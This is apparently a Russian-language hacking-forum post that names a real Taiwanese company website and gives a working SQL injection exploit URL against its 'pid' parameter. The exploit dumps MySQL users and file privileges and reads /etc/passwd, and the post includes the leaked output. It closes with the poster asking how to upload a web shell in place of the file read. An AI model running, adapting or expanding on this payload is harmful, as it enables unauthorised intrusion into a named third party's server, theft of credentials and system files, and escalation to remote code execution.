↑
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
Код:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...